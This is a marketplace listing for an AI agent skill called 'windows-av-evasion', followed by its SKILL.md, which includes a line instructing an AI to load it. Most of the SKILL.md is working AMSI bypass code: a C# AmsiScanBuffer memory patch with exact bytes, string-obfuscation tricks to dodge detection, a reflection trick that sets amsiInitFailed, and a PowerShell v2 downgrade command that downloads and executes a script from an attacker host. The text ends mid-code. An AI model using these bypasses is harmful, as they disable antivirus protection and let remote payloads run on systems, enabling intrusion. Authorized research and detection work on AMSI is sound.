
Windows Av Evasion
Study AMSI architecture and documented bypass patterns for authorized Windows security research and defensive testing.
Overview
Windows Av Evasion is an agent skill for the Ship phase that documents AMSI bypass architecture and detailed AmsiScanBuffer patching patterns for authorized security testing.
Install
npx skills add https://github.com/yaklang/hack-skills --skill windows-av-evasion
What is this skill?
- AMSI architecture diagram from script hosts through amsi.dll to AmsiScanBuffer and AV engines
- Memory patching pattern targeting AmsiScanBuffer to return clean scan results (with obfuscated PowerShell examples)
- Supplement module: load after the main SKILL.md for PowerShell, .NET AMSI bypass, and Constrained Language Mode escape details
- Documents primary API surface: AmsiInitialize, AmsiOpenSession, AmsiScanBuffer, AmsiScanString, AmsiCloseSession
- AMSI flow documents 5 core amsi.dll entry points (Initialize, OpenSession, ScanBuffer, ScanString, CloseSession)
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 0/3 security scanners passed (skills.sh audits).
What problem does it solve?
You are analyzing how AMSI inspects PowerShell and .NET in Windows but lack structured bypass patterns for authorized lab reproduction.
Who is it for?
Authorized red-teamers, security researchers, and defenders building detection rules who need AMSI-specific pattern literacy.
Skip if: Casual app developers, production feature work, or anyone without clear legal permission to test on the target environment.
When should I use this skill?
Detailed AMSI bypass code patterns, PowerShell-specific bypasses, .NET AMSI bypass, or Constrained Language Mode escape after main SKILL.md is loaded.
What do I get? / Deliverables
You understand AMSI call flow, primary patch targets, and supplement topics so defensive tests or research notes can reference consistent technique categories.
- AMSI architecture reference and patch-target notes
- Categorized bypass pattern outlines for research documentation
How it compares
Offensive technique deep-dive paired with a parent evasion SKILL.md—not a compliance checklist or dependency vulnerability scanner.
Common Questions / FAQ
Who is windows-av-evasion for?
Security practitioners with authorization to study Windows AMSI bypass methods for penetration testing, malware analysis, or blue-team detection engineering.
When should I use windows-av-evasion?
During Ship → security in controlled labs when reproducing AMSI behavior, after loading the main AV evasion SKILL.md for broader context.
Is windows-av-evasion safe to install?
Content is sensitive offensive-security material; review the Security Audits panel on this Prism page, your org policy, and never run patterns on systems you do not own or lack written permission to test.
SKILL.md - Windows Av Evasion
# AMSI Bypass Techniques — Detailed Patterns

> **AI LOAD INSTRUCTION**: Load this for detailed AMSI bypass code patterns, PowerShell-specific bypasses, .NET AMSI bypass, and Constrained Language Mode escape. Assumes the main [SKILL.md](./SKILL.md) is already loaded for general AV/EDR evasion concepts.

---

## 1. AMSI ARCHITECTURE

```
PowerShell / .NET / VBScript / JScript
        │
        ▼
amsi.dll (loaded in process)
        │
        ├── AmsiInitialize()   → Create AMSI context
        ├── AmsiOpenSession()  → Open scan session
        ├── AmsiScanBuffer()   → Scan content        ← PRIMARY TARGET
        ├── AmsiScanString()   → Scan string
        └── AmsiCloseSession() → Close session
        │
        ▼
AV Engine (Windows Defender / third-party)
        │
        ▼
AMSI_RESULT (Clean / Malware / Not Detected)
```

**Key insight**: Patching `AmsiScanBuffer` to always return "clean" bypasses all AMSI-enabled scanning.

---

## 2. MEMORY PATCHING — AmsiScanBuffer

### Concept

Overwrite the first bytes of `AmsiScanBuffer` so it returns `AMSI_RESULT_CLEAN` (0) immediately.

### PowerShell Implementation (Obfuscated)

```powershell
# Base pattern — variable names must be randomized per use
$a = [Ref].Assembly.GetTypes() | ? { $_.Name -like "*siUtils" }
$b = $a.GetFields('NonPublic,Static') | ? { $_.Name -like "*Context" }
# ... patching logic varies by implementation
# The actual patch writes bytes to AmsiScanBuffer:
# x64: mov eax, 0x80070057 (E_INVALIDARG); ret
# Bytes: B8 57 00 07 80 C3
```

### C# Implementation

```csharp
// Get amsi.dll handle and AmsiScanBuffer address
IntPtr amsiDll = LoadLibrary("amsi.dll");
IntPtr amsiScanBufferAddr = GetProcAddress(amsiDll, "AmsiScanBuffer");

// Change memory protection to writable
VirtualProtect(amsiScanBufferAddr, (UIntPtr)6, 0x40, out uint oldProtect);

// Patch: mov eax, 0x80070057; ret (returns E_INVALIDARG)
byte[] patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
Marshal.Copy(patch, 0, amsiScanBufferAddr, patch.Length);

// Restore protection
VirtualProtect(amsiScanBufferAddr, (UIntPtr)6, oldProtect, out _);
```

### Obfuscation Techniques for the Patch

```powershell
# Avoid string "AmsiScanBuffer" (itself flagged):

# XOR obfuscation
$xorKey = 0x42
$encBytes = [byte[]]@(0x23,0x2F,0x31,...)  # XOR-encrypted function name

# String split
$p1 = "Am"; $p2 = "si"; $p3 = "Sc"; $p4 = "anBuf"; $p5 = "fer"
$funcName = "$p1$p2$p3$p4$p5"

# Reverse string
$rev = "reffuBnacSimA"
$funcName = -join ($rev[-1..-($rev.Length)])
```

---

## 3. REFLECTION-BASED BYPASS

### Set amsiInitFailed

```powershell
# Force AMSI initialization failure via reflection
# The field name and class are obfuscated because they're flagged
$t = [Ref].Assembly.GetType(('System.Management.Automation.{0}' -f ('Am','siUtils' -join '')))
$f = $t.GetField(('am','siIn','itFailed' -join ''), 'NonPublic,Static')
$f.SetValue($null, $true)
# All subsequent AMSI scans skip (init "already failed")
```

### Disable AMSI via Session State

```powershell
# Remove AMSI providers from session
$utils = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
$field = $utils.GetField('amsiSession', 'NonPublic,Static')
$session = $field.GetValue($null)
# Nullify session → AMSI has no active session to scan with
```

---

## 4. POWERSHELL-SPECIFIC BYPASSES

### PowerShell v2 Downgrade

```cmd
:: If .NET Framework 2.0/3.5 is installed, PS v2 has no AMSI
powershell -Version 2 -Command "IEX (New-Object Net.WebClient).DownloadString('http://attacker/payload.ps1')"

:: Check if v2 is available
reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP\v2.0.50727"
```

### PowerShell Runspace (Bypass Script Block Logging + AMSI)

```csharp
// C# — create PowerShell runspace without AMSI
using System.Management.Automation;
using System.Management.Automation.Runspaces;

Runspace rs = RunspaceFactory.CreateRunspace();
rs.Open();
// Patch AMSI in this runspace
PowerShell ps = PowerShell.Create();
ps.Runspace = rs;
ps.AddSc
```